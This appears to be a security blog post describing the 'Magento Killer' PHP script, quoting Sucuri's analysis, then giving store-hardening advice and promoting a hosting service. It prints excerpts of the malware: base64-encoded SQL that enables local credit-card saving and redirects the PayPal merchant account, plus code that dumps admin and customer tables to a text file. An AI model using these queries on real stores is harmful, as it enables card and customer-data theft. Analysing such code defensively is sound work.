What Is Magento Killer and How You Can Protect Your Magento Stores?

Security is the industry’s watchword these days and ecommerce platforms consider security features as their main USP. Similarly, when it comes to online shopping, the users consider platform security as an important trust factor that heavily influence their choice of a particular online store. Since Magento (particularly Magento 2) powers a significant portion of online commerce, it is no surprise that it is often the target of cyber criminals who come up with devious ways of exploiting the loopholes and gain access to the confidential data. Just a few months ago, a vulnerability was identified in Magento CMS where hackers used the old tried and tested SQL injection attack to gain easy access to unpatched (and thus vulnerable) Magento stores. Fortunately, the community reacted swiftly and a patch,  PRODSECBUG-2198 was released to deal with the issue. The latest threat to emerge for Magento powered stores is a malicious PHP script known as Magento Killer. This vulnerability targets Magento stores to hack payment details of the store visitors.

What Is Magento Killer?

According to Sucuri researcher, Luke Leak, Magento Killer modifies the core_config_data table which allows the attacker to get the payment information from the compromised Magento store. Here’s what Luke shared about the issue:

During the initial stages of the attack, the bad actor uses special SQL queries encoded in base64. We’ve decoded these strings under their respective lines in the sample below for your reference:

$ConfKiller = array( 
'Update DB (Savecc)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVf
aWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF
0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='),
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/
ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
'Update PP (MailPP)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lk
YCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3R
lZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/
general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/
business_account';

In $ConfKiller,two major malicious operations are being executed: Update DB (Savecc): This function configures the Magento core function to get the client credit card information without letting it go through the typical payment processes that secures the payment information. Update PP (MailPP): This function allows the attacker to make changes in PayPal merchant business account associated with the Magento website. Though Magento does encrypt the locally saved credit card information, in this scenario, this process is not enough because the attacker can modify the Magento core file to steal the encryption from Magento file (./app/etc/local.xml). Once the attacker has access to your site, the attack usually doesn’t remain limited to just the credit card information. Rather, the attacker gains access to everything in the database. For this, the attacker can create an additional variable in the SQL queries to extract the information from the compromised Magento database.

$query = array(
'admin_user' => 'SELECT * FROM admin_user' ,
'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' ,'aw_blog_comment'
 => 'SELECT * FROM aw_blog_comment' ,

'customer_entity' => 'SELECT * FROM customer_entity' ,

The array listing has been shortened for brevity. But, it pulls any customer information stored in the most common Magento database tables (e.g customer_entity, newsletter_subscriber). It then trims this data, keeping only the information required for fraudulent purchases. Finally, it generates a *-shcMail.txt file in the directory containing the relevant customer information.

$namefile = md5(time())."-shcMail.txt";
foreach ($query as $shc_key => $shc_query) {
$hasil = mysql_query($shc_query);
while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
$mail[] = $kolom_db[$shcolom[$shc_key]];
$myfile = fopen($namefile, "a+") or die("Unable to open file!");
fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."\r\n");
fclose($myfile);

When running this malicious script in a web browser, it simply provides a hyperlink to the generated *-shcMail.txt file. Then it reports back to inform the attacker if the initial two-setting changes were successful or not.

Source: Sucuri

How to Make Your Magento Store More Secure

Threats like Magento Killer will continue to emerge and it is your responsibility as the store owner to ensure the protection of the store. To help you get started, here are some essential security precautions which every Magento store owner should implement ASAP on the store.

Magento Security Checker

Identifying vulnerabilities is the first step in protecting your store. For this, Magento provides a great tool, Magento security scan tool that scans your stores and reports all potential vulnerabilities and patches (if available) that fix these issues.

Regularly Update Your Magento Installation

Magento releases regular updates that provide bug fixes and performance improvements. Many store owners often overlook the need to update their Magento core because of ignorance or the fear that the store might break after the update. However, regularly updating the Magento core enhances the security of the store by closing off known loopholes.

Follow The Best Magento Development Practices

Since Magento is open source (community edition), developers can easily customize the platform as per the requirements of the store. However, while developing on the Magento platform, developers should always observe the best practices as documented by Magento. Observing these development guidelines improves the security of the store and prevents commonly-known security issues from slipping in the codebase.

Host Your Magento Store On a Secure Server

Many first-timers make the mistake of hosting their Magento site on a shared hosting. This is the worst you can do to any ecommerce site. I recommend hosting your online store on a dedicated server so that you can set up and optimize the server as per your requirements. The downside is that dedicated servers are often out of the budget of many small and mid-level stores. In such cases, the best choice is to host the Magento store on a Best Magento Hosting which can be optimized and make secure in just a few clicks.